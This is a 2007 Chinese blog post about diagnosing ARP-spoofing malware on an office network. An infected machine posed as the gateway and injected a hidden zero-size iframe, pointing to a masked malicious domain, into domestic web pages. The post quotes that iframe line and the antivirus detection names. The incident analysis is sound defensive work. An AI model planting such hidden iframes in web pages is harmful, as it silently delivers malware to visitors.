ARP病毒“吃里巴外”？

endurer 原创
2007-05-16 第1版

今天上午，我们单位里的电脑，打开国内网站的网页都报病毒

卡巴都报：

/---
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.gen (修改) URL: hxxp://q***.z*px**5**2*0.com/w***.js
---/

瑞星都报发现：Trojan.DL.VBS.Agent.cog、Hack.SuspiciousAni。

检查这些被报含病毒的网页的源代码，发现头部都被加入了代码：
/---
＜iframe src＝'hxxp://www.z*px**5**2*0.com/0***.htm' width=0 height=0＞＜/iframe＞
---/

比国宝自动在网页加代码还利害……

奇怪的是，打开Google等国外的网站就没事……查看这些国外网站的网页的源代码，没有被加入恶意代码……

难道这病毒还“吃里巴外”？

中午认真排查，发现一根网线，一接到交换机上就出现上述问题，此时网关可以正常Ping通；把这根网线拔掉，网关就Ping不通了，需要重启交换机等设备才能恢复正常。

看来这个病毒发作时，使用ARP欺骗技术，把自身所在的电脑伪装为网关，这样局域网中其它电脑与外网的数据交换都要经过它，病毒就可以往网页数据里加入包含恶意网址代码了。